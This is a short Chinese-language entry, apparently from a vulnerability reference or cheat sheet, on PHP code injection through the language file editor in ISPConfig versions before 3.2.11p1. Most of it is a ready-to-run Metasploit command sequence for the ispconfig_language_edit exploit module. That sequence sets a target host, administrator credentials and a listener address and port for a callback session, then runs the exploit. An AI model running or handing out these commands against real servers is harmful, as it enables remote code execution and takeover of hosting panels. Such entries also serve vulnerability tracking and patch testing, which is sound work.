
Metasploit 模块

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
在 ISPConfig 3.2.11p1 之前版本中发现了一个问题。如果启用了 admin_allow_langedit,管理员可以通过语言文件编辑器实现 PHP 代码注入。